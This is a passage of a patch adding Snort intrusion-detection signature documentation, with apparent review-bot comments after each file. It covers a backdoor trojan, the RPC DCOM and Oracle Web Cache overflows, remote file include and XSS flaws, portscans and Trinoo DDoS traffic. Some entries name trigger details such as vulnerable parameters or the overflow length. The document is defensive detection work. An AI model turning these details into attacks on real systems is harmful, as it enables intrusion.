+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
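Review bot: a stray blank line between "--" and "Corrective Action:" (just after the False Negatives block) breaks the section delimiter convention used throughout these files and should be removed. "Microsoft Windows Server 2000" in Affected Systems is not a Microsoft product name; the product is "Windows 2000 Server". The Additional References section is empty for a Microsoft vulnerability with a described cause (unchecked buffer when processing message length in the License Logging Service); the corresponding Microsoft security bulletin should be cited so the "appropriate vendor supplied patches" can be identified.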
--- /dev/null
+++ b/doc/signatures/106.txt
@@ -0,0 +1,92 @@
+Rule:
+
+--
+Sid:
+106
+
+--
+Summary:
+Backdoor.AckCmd is a Trojan Horse that uses TCP ACK segments to
+communicate. This Trojan may bypass firewalls that do not keep track of
+the session state in a TCP transaction.
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a
+compromise of all resources the machine is connected to. This Trojan
+also has the ability to delete data, steal passwords and disable the
+machine. Other versions are capable of launching DDoS attacks.
+
+--
+Detailed Information:
+This Trojan affects the following operating systems:
+
+	Windows 95
+	Windows 98
+	Windows ME
+	Windows NT
+	Windows 2000
+	Windows XP
+
+No other systems are affected. This is a windows executable that does
+not make changes to the system registry.
+
+AckCmd is a "proof of concept" Trojan.
+
+	SID	Message
+	---	-------
+	106	ACKcmdC trojan scan
+
+This event is indicative of an attacker attempting to locate AckCmd
+servers.
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This
+event is indicative of an existing infection being activated. Initial
+compromise can be in the form of a Win32 installation program that may
+use the extension ".jpg" or ".bmp" when delivered via e-mail for
+example.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised.
+Updated virus definition files are essential in detecting this Trojan.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Delete the file AckCmd.exe
+
+A machine reboot is required to clear the existing process from running
+in memory.
+
+In addition, the use of a firewall that correctly checks the state of a
+TCP session is recommended.
+
+--
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Whitehats arachNIDS
+http://www.whitehats.com/info/IDS485
+
+ntsecurity.nu
+ACK Tunneling Trojans
+http://ntsecurity.nu/papers/acktunneling/
+
+--
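Review bot: the Detailed Information and Attack Scenarios sections of doc/signatures/106.txt disagree about what the event means. Detailed Information says "This event is indicative of an attacker attempting to locate AckCmd servers" (a scan for existing backdoors), while Attack Scenarios says "This event is indicative of an existing infection being activated"; only one can be the trigger, and the SID table names the rule "ACKcmdC trojan scan", so the Attack Scenarios text should be aligned with the scan interpretation. The file also has no Affected Systems section; the operating system list currently sits inside Detailed Information and should move to the standard section. Minor: "a windows executable" should capitalize Windows, and Corrective Action begins with a blank line unlike the other sections.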
--- /dev/null
+++ b/doc/signatures/3317.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3317
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
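Review bot: the Additional References section of doc/signatures/3317.txt is empty for the RPC DCOM vulnerability, which has a Microsoft security bulletin; citing it would let readers match the "appropriate vendor supplied patches" to the Affected Systems list. "Expoit code exists" in Ease of Attack is a typo for "Exploit". The Attack Scenarios text ("a request for a file with an overly long filename via a network share") does not obviously connect to the Detailed Information description of "malformed data via RPC" to DCOM; one sentence explaining how that filename reaches the RPC DCOM interface would remove the apparent mismatch.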
--- /dev/null
+++ b/doc/signatures/2979.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+2979
+
+--
+Summary:
+This event is generated when an attempt is made to access the C$ default
+administrative share of a Windows host.
+
+--
+Impact:
+Serious. Possible administrator access to the host. Information 
+disclosure.
+
+--
+Detailed Information:
+By default, Windows hosts have default administrative shares of the 
+local hard drives using the format %DRIVE_LETTER% + $. Anybody with 
+administrative rights can remotely access the share.
+
+--
+Affected Systems:
+	Windows hosts.
+
+--
+Attack Scenarios:
+An attacker may be attempting to access files located on the C drive of 
+the host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow Netbios access from external networks (tcp port 139).
+
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Josh Sakofsky
+
+-- 
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS339
+
+Microsoft:
+http://support.microsoft.com/default.aspx?scid=kb;en-us;100517
+
+--
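Review bot: the Corrective Action "Disallow Netbios access from external networks (tcp port 139)" is incomplete for the hosts described: Windows 2000 and later also serve SMB directly over TCP port 445, so administrative share access survives a filter on 139 alone; the port list used in doc/signatures/3317.txt in this same patch ("135, 139 and 445") is the one to apply here. The Detailed Information text should also say "administrative shares named with the drive letter followed by $ (for example C$)" rather than the pseudo-template "%DRIVE_LETTER% + $", which reads like an unexpanded variable. Minor: "None Known" capitalization and the trailing space after "--" before Additional References differ from the rest of the file.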
--- /dev/null
+++ b/doc/signatures/122-21.txt
@@ -0,0 +1,93 @@
+
+
+Rule:
+
+--
+Sid:
+122-21
+
+--
+Summary:
+This event is generated when the pre-processor sfPortscan detects
+network traffic that may constitute an attack. Specifically a udp
+filtered portscan was detected.
+
+--
+Impact:
+Unknown. This is normally an indicator of possible network
+reconnaisance and may be the prelude to a targeted attack against the
+targeted systems.
+
+--
+Detailed Information:
+This event is generated when the sfPortscan pre-processor detects
+network traffic that may consititute an attack.
+
+A portscan is often the first stage in a targeted attack against a
+system. An attacker can use different portscanning techniques and tools
+to determine the target host operating system and application versions
+running on the host to determine the possible attack vectors against
+that host.
+
+More information on this event can be found in the individual
+pre-processor documentation README.sfportscan in the docs directory of
+the snort source. Descriptions of different types of portscanning
+techniques can also be found in the same documentation, along with
+instructions and examples on how to tune and use the pre-processor.
+
+--
+Affected Systems:
+	All.
+
+--
+Attack Scenarios:
+An attacker often uses a portscanning technique to determine operating
+system type and version and also application versions to determine
+possible effective attack vectors that can be used against the target
+host.
+
+--
+Ease of Attack:
+Simple. Many portscanning tools are freely available.
+
+--
+False Positives:
+While not necessarily a false positive, a security audit or penetration
+test will often employ the use of a portscan in the same way an
+attacker might use the technique. If this is the case, the
+pre-processor should be tuned to ignore the audit if so desired.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check for other events targeting the host.
+
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches as appropriate.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Daniel Roelker <droelker@sourcefire.com>
+Marc Norton    <mnorton@sourcefire.com>
+Jeremy Hewlett <jh@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Nmap:
+http://www.insecure.org/nmap/
+
+Port Scanning Techniques and the Defense Against Them - Roger
+Christopher, SANS:
+http://www.sans.org/rr/whitepapers/auditing/70.php
+
+Hypervivid Tiger Team - Port-Scanning: A Practical Approach
+http://www.hcsw.org/reading/nmapguide.txt
+
+--
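Review bot: spelling in doc/signatures/122-21.txt: "reconnaisance" (Impact) should be "reconnaissance" and "consititute" (Detailed Information) should be "constitute". The last Corrective Action sentence, "Apply any appropriate vendor supplied patches as appropriate", says "appropriate" twice; "Apply any vendor supplied patches as appropriate" suffices. The file opens with two blank lines before "Rule:" unlike the other documents, and the Summary uses the bare event name "udp filtered portscan" without defining "filtered"; one clause stating what distinguishes a filtered scan from a plain one would save the reader a trip to README.sfportscan.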
--- /dev/null
+++ b/doc/signatures/2455.txt
@@ -0,0 +1,52 @@
+Rule:
+
+--
+Sid:
+2455
+
+--
+Summary:
+This event is generated when a host in your network that has Yahoo Instant Messenger running has sent a message to a Yahoo IM conference.
+
+--
+Impact:
+Possible policy violation.  Instant Messenger programs may not be appropriate in certain network environments.
+
+--
+Detailed Information:
+A Yahoo IM conference allows multiple users to participate in the exchange of text and voice messages, as well as share files and webcams.  It is possible that a file that is exchanged may contain malicious code such as as virus, worm, Trojan, or backdoor.  Also, since all exchanges are done via Yahoo IM servers and in clear text, there should be no expectation of privacy.
+
+--
+Affected Systems:
+Any host running Yahoo Instant Messenger.
+
+--
+Attack Scenarios:
+A Yahoo IM user may unwittingly accept a malicious file.
+
+--
+Ease of Attack:
+Easy to transfer a malicious file.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+It may be possible for Yahoo IM traffic to use other ports than the default expected ones.  
+
+--
+Corrective Action:
+Disallow the use of IM clients on the protected network and enforce or implement an organization wide policy on the use of IM clients.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+--
+Additional References:
+Yahoo Protocol
+http://www.cse.iitb.ac.in/~varunk/YahooProtocol.htm
+
+--
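Review bot: "such as as virus, worm, Trojan, or backdoor" in Detailed Information duplicates "as" ("such as a virus"). Contributors runs straight into "--" without the blank line used everywhere else. The False Negatives note that Yahoo IM "may use other ports than the default expected ones" would be more useful if it named the ports the rule inspects, as doc/signatures/2559.txt does for Oracle Web Cache ("port 7777 or 7778"), so the operator knows which variable to tune.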
--- /dev/null
+++ b/doc/signatures/2835.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2835
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure purge_master_log
+. This procedure is included in
+sys.dbms_repcat_mas.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
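Review bot: the Detailed Information paragraph in doc/signatures/2835.txt is broken across lines mid-sentence, with a period on a line of its own: "vulnerability in the procedure purge_master_log" / "." / "This procedure is included in"; this should read as one sentence, "vulnerability in the procedure purge_master_log. This procedure is included in sys.dbms_repcat_mas." "Oracle Oracle9i" in Affected Systems repeats the vendor name. The Additional References section is empty for an Oracle vulnerability with a named package and procedure; the Oracle alert covering the dbms_repcat_mas overflows should be cited to support the "Apply the appropriate vendor supplied patch" advice.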
--- /dev/null
+++ b/doc/signatures/121-3.txt
@@ -0,0 +1,98 @@
+
+
+Rule:
+
+--
+Sid:
+121-3
+
+--
+Summary:
+This event is generated when the pre-processor flow-portscan detects
+network traffic that may constitute an attack. Specifically a fixed
+scale talker limit exceeded event was generated.
+
+--
+Impact:
+Unknown. This is normally an indicator of possible network
+reconnaisance and may be the prelude to a targeted attack against the
+targeted systems.
+
+--
+Detailed Information:
+This event is generated when the flow-portscan pre-processor detects
+network traffic that may consititute an attack.
+
+The flow-portscan pre-processor uses a flow based technique to identify
+portscanning in one-to-many and many-to-one scenarios based on flow
+creation in the flow pre-processor.
+
+A portscan is often the first stage in a targeted attack against a
+system. An attacker can use different portscanning techniques and tools
+to determine the target host operating system and application versions
+running on the host to determine the possible attack vectors against
+that host.
+
+More information on this event can be found in the individual
+pre-processor documentation README.flow-portscan in the docs directory
+of the snort source. Descriptions of different types of portscanning
+techniques can also be found in the same documentation, along with
+detailed instructions and examples on how to tune and use the
+pre-processor.
+
+--
+Affected Systems:
+	All.
+
+--
+Attack Scenarios:
+An attacker often uses a portscanning technique to determine operating
+system type and version and also application versions to determine
+possible effective attack vectors that can be used against the target
+host.
+
+--
+Ease of Attack:
+Simple. Many portscanning tools are freely available.
+
+--
+False Positives:
+While not necessarily a false positive, a security audit or penetration
+test will often employ the use of a portscan in the same way an
+attacker might use the technique. If this is the case, the
+pre-processor should be tuned to ignore the audit if so desired.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check for other events targeting the host.
+
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches as appropriate.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Chris Green <cmg@snort.org>
+Daniel Roelker <droelker@sourcefire.com>
+Marc Norton    <mnorton@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Nmap:
+http://www.insecure.org/nmap/
+
+Port Scanning Techniques and the Defense Against Them - Roger
+Christopher, SANS:
+http://www.sans.org/rr/whitepapers/auditing/70.php
+
+Hypervivid Tiger Team - Port-Scanning: A Practical Approach
+http://www.hcsw.org/reading/nmapguide.txt
+
+--
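Review bot: the same spelling errors as in doc/signatures/122-21.txt recur here: "reconnaisance" (Impact) and "consititute" (Detailed Information), and Corrective Action again reads "Apply any appropriate vendor supplied patches as appropriate". Since the Impact, Attack Scenarios, Ease of Attack, False Positives and Corrective Action sections are copied verbatim between the sfPortscan and flow-portscan documents, fixing them once and re-copying would keep both consistent. The Summary's "fixed scale talker limit exceeded" is the raw event name; a clause defining "talker" and "fixed scale" in flow-portscan terms would make the event interpretable without opening README.flow-portscan.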
--- /dev/null
+++ b/doc/signatures/100000840.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000840
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "FlatNuke" application running on a webserver. Access to the file "index.php" using a remote file being passed as the "mod" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "mod" parameter in the "index.php" script used by the "FlatNuke" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using FlatNuke
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
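Review bot: the third Detailed Information paragraph of doc/signatures/100000840.txt is generic authentication boilerplate ("validating the credentials of a client host connecting to the services offered") and the first Attack Scenarios sentence ("An attacker can access an authentication mechanism and supply his/her own credentials") describes credential abuse, neither of which matches the remote file include via the "mod" parameter of "index.php" that the Summary and first paragraph describe; trim to the RFI-specific text. "ona web server" is missing a space. The blank line before "--" is missing after the Sid value, after Affected Systems and after Contributors, unlike the other files.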
--- /dev/null
+++ b/doc/signatures/2662.txt
@@ -0,0 +1,54 @@
+Rule: 
+
+--
+Sid: 
+2662
+
+-- 
+Summary: 
+This rule is intended to increase the accuracy of rules designed to
+generate events based on attempts to exploit implementations of Secure
+Socket Layer (SSL) version 2.
+
+-- 
+Impact: 
+None. This is a protocol decode rule that does not generate events.
+
+--
+Detailed Information:
+This is a protocol decode rule that does not generate events.
+
+--
+Affected Systems:
+NA
+
+--
+Attack Scenarios: 
+NA
+
+-- 
+Ease of Attack: 
+NA
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+NA
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
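Review bot: the Detailed Information section of doc/signatures/2662.txt merely repeats the Impact sentence ("This is a protocol decode rule that does not generate events.") and never says how the rule "increase[s] the accuracy" of the SSL version 2 rules it supports; one sentence naming the state it records for those rules to test would make the document useful. "Secure Socket Layer" should be "Secure Sockets Layer". "NA" for Affected Systems, Attack Scenarios, Ease of Attack and Corrective Action is fine, but "None Known" for False Positives and False Negatives is odd for a rule that generates no events; "NA" would be consistent.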
--- /dev/null
+++ b/doc/signatures/329.txt
@@ -0,0 +1,65 @@
+Rule: 
+
+--
+Sid: 329
+
+-- 
+Summary: 
+This is an intelligence gathering activity. This event is indicative of a connection laundering attack against the finger daemon
+
+-- 
+Impact: 
+The attacker may obtain information about a third party host without making a direct connection to that host.
+
+--
+Detailed Information:
+The event is generated when an attempt to use a machine to run
+finger queries against a third party UNIX system is attempted by the
+Cybercop vulnerability scanner. 
+
+The attack utilizes "finger forwarding" functionality, normally used to forward queries to a third party machine. The information is obtained without a direct connection to the said third party, since the target system performs a connection to the third party host for the attacker. 
+
+The Finger daemon is used to provide information about users on a UNIX system. It used to be installed and enabled by default on most UNIX/Linux systems. The attack if successful, will confirm that the target host will try to forward queries.
+
+--
+
+Attack Scenarios: 
+An attacker uses the Cybercop vulnerability scanner to test for this weakness.
+
+-- 
+
+Ease of Attack: 
+Simple, performed by a scanner
+
+-- 
+
+False Positives: 
+None Known
+
+--
+False Negatives: 
+None Known
+
+-- 
+
+Corrective Action: 
+Disable the finger daemon or upgrade to a daemon without finger forwarding functionality
+
+
+--
+Contributors: 
+Original rule written by Max Vision <vision@whitehats.com>
+Snort documentation contributed by Anton Chuvakin <http://www.chuvakin.org>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0105
+
+Arachnids:
+http://www.whitehats.com/info/IDS11
+
+--
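Review bot: doc/signatures/329.txt departs from the file format in several places: "Sid: 329" puts the value on the heading line instead of the line below it, there is no Affected Systems section between Detailed Information and Attack Scenarios, and several "--" delimiters are followed by a spurious blank line (before Attack Scenarios, Ease of Attack, False Positives and Corrective Action). In the prose, the Summary sentence lacks a terminating period, and "The attack if successful, will confirm" needs the comma moved ("The attack, if successful, will confirm"). The Detailed Information sentence "The event is generated when an attempt to use a machine to run finger queries ... is attempted" doubles "attempt"; "is generated when the Cybercop vulnerability scanner attempts to use a machine to run finger queries against a third party UNIX system" is tighter.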
--- /dev/null
+++ b/doc/signatures/2036.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+2036
+
+--
+Summary:
+Network Status Monitor (NSM) is used to indicate whether a host is up or
+for its status.
+
+--
+Impact:
+Intelligence gathering about the current state of a host and whether rpc
+services are available.
+
+--
+Detailed Information:
+NSM runs on client machines and informs other hosts of the status of 
+that machine should a crash or reboot occur. Each remote application 
+using an rpc service can therefore register with the host when services 
+are once again available.
+
+A request made to a machine will indicate to the attacker the status of 
+that host and will also be indicative of rpc services being available. 
+The attacker might then continue to ascertain which rpc services are 
+being offered and then launch an attack on vulnerable daemons.
+
+--
+Affected Systems:
+Any system running the service.
+
+--
+Attack Scenarios:
+An attacker merely needs to request the status of the host using rpc.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow all RPC requests from external sources and use a firewall to 
+block access to RPC ports from outside the LAN.
+
+Use the hosts.allow file to restrict the hosts able to request the 
+status of the server.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Network Status Monitor Protocol, The Open Group:
+http://www.opengroup.org/onlinepubs/009629799/chap11.htm
+
+--
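Review bot: the Summary of doc/signatures/2036.txt, "is used to indicate whether a host is up or for its status", is ungrammatical and, unlike the other files, does not say what the event is; "This event is generated when a request is made to the Network Status Monitor (NSM) RPC service, which reports whether a host is up" would match the rest of the patch. The first Corrective Action sentence says the same thing twice ("Disallow all RPC requests from external sources and use a firewall to block access to RPC ports from outside the LAN"); one clause suffices. "rpc" should be "RPC" throughout (the second Corrective Action paragraph already capitalizes it).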
--- /dev/null
+++ b/doc/signatures/2654.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+2654
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the web application PHPNuke.
+
+--
+Impact:
+SQL Injection is possible leading to a complete compromise of the data
+in the application database.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the PHPNuke web application running on a server.
+
+Insufficient checks are made on user input supplied to the script
+"viewtopic.php", exploitation of this issue could present an attacker
+with the opportunity to inject SQL code of their choosing into a
+vulnerable system.
+
+--
+Affected Systems:
+	PHPNuke 6.0
+	PHPNuke 6.5 RC2
+
+--
+Attack Scenarios:
+An attacker can supply code of their choice by including it in the
+URI that calls on viewtopic.php.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Consider reviewing the database permissions for the application.
+
+--
+Contributors:
+Sourcefire Research Team
+Ricky MacAtee <rmacatee@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
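Review bot: "Insufficient checks are made on user input supplied to the script "viewtopic.php", exploitation of this issue could present" in doc/signatures/2654.txt is a comma splice; make it two sentences. The Additional References section is empty although Affected Systems pins the issue to "PHPNuke 6.0" and "PHPNuke 6.5 RC2"; the advisory that identifies those versions should be cited. Detailed Information would also help tuning if it named which viewtopic.php parameter the rule inspects, since Attack Scenarios only says "including it in the URI that calls on viewtopic.php".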
--- /dev/null
+++ b/doc/signatures/2559.txt
@@ -0,0 +1,71 @@
+Rule: 
+
+--
+Sid: 
+2559
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Oracle Application Server Web Cache.
+
+-- 
+
+Impact: 
+Serious. Possible execution of arbitrary code leading to remote
+administrative access.
+
+--
+Detailed Information:
+The Oracle Application Server Web Cache is vulnerable to a buffer
+overrun caused by poor checking of the length of an HTTP Header. If a
+large invalid HTTP Request Method is supplied to a vulnerable system, an
+attacker may be presented with the opportunity to overrun a fixed length
+buffer and subsequently execute code of their choosing on the server.
+
+--
+Affected Systems:
+Oracle Application Server Web Cache 10g 9.0.4 .0
+Oracle Oracle9i Application Server Web Cache 2.0 .0.4
+Oracle Oracle9i Application Server Web Cache 9.0.2 .3
+Oracle Oracle9i Application Server Web Cache 9.0.2 .2
+Oracle Oracle9i Application Server Web Cache 9.0.3 .1
+
+--
+
+Attack Scenarios: 
+An attacker might supply an HTTP Request Method of more than 432 bytes,
+causing the overflow to occur.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives:
+None Known
+
+--
+False Negatives:
+This rule examines Oracle Web Cache server on port 7777 or 7778.  It is possible
+to configure the Oracle Web Cache server to run on different ports.  The rule
+should be configured to reflect the appropriate ports of Oracle Web Cache
+servers on your network.
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
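Review bot: the Detailed Information of doc/signatures/2559.txt attributes the overrun to "poor checking of the length of an HTTP Header", but the next clause and the Attack Scenarios ("an HTTP Request Method of more than 432 bytes") describe an over-long request method, which is part of the request line rather than a header; pick one description so the reader knows what the rule matches. The Affected Systems version strings contain stray spaces ("10g 9.0.4 .0", "2.0 .0.4", "9.0.2 .3"); they should read "9.0.4.0", "2.0.0.4", "9.0.2.3". The False Negatives note about ports 7777/7778 is the right kind of tuning detail; the Additional References section, however, is empty and should cite the Oracle alert for this overflow.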
--- /dev/null
+++ b/doc/signatures/100000848.txt
@@ -0,0 +1,66 @@
+Rule:
+
+--
+Sid:
+100000848
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "PhpWebGallery" application running on a 
+webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "keyword" parameter in the "comments.php" 
+script 
+used by the "PhpWebGallery" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using PhpWebGallery
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Chris Jacob <chris.jacob@sourcefire.com>
+
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
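Review bot: the Impact and the second Detailed Information paragraph describe the wrong class of flaw for this hunk. The Summary says it is a cross site scripting bug in the "keyword" parameter of "comments.php", which runs script in a victim's browser; "Possible execution of arbitrary code of the attackers choosing" and "execute system binaries" on the server are remote file include boilerplate and overstate it. Replace them with the XSS consequences that Attack Scenarios already implies (theft of the victim's session or data, actions performed as that user). Also join the dangling line "script" with "used by the "PhpWebGallery" application", and make Affected Systems list the vulnerable PhpWebGallery versions rather than "All systems running CGI applications using PhpWebGallery".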
--- /dev/null
+++ b/doc/signatures/232.txt
@@ -0,0 +1,70 @@
+Rule:
+--
+Sid:
+232
+
+--
+Summary:
+This event is generated when a pong packet for the Trinoo (aka trin00) 
+DDos suite is detected.
+
+--
+Impact:
+This may indicate a compromised system or be the prelude to a
+Distributed Denial of Service (DDoS) attack.
+
+--
+Detailed Information:
+Once a Trinoo client has been installed on a compromised machine and a master is
+ready and listening, the master sends a "png" (ping) command to its drones in 
+an attempt to enumerate the drone network. A functioning client will respond to 
+port 31335/udp with the text "PONG".
+
+Once a machine becomes part of a trin00 network, a Denial of Service (DoS) 
+is typically initiated against one (or more) victim machines.
+
+--
+Affected Systems:
+ 
+--
+Attack Scenarios:
+As part of a large scale attack against a machine or a network, an
+attacker will compromise large numbers of machines which will form the
+army that the trin00 master daemon will command.  The master daemon
+typically instructs the clients to send mass-quantities of packets to
+a set of victim hosts.  If the traffic is sufficient, the victim
+machines will become resource deprived and thus endure a DoS condition.
+
+--
+Ease of Attack:
+Simple. Trinoo client and master programs are widely available.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disconnect infected machine(s) from the network immediately.
+
+Use software to determine if a host has been compromised using a
+rootkit.
+
+--
+Contributors:
+Original rule writer unknown
+Snort documentation contributed by Jon Hart <warchild@spoofed.org>
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+SANS:
+http://www.sans.org/newlook/resources/IDFAQ/trinoo.htm
+
+--
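Review bot: Affected Systems is empty and the Summary has a typo ("DDos"). Since any host on which the trin00 daemon has been installed is affected regardless of operating system, say that. The Corrective Action "Use software to determine if a host has been compromised using a rootkit" is vague; point the reader at looking for the daemon process and for the outbound "PONG" reply to 31335/udp that Detailed Information describes, since that is the evidence this rule has just produced.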
--- /dev/null
+++ b/doc/signatures/2312.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+2312
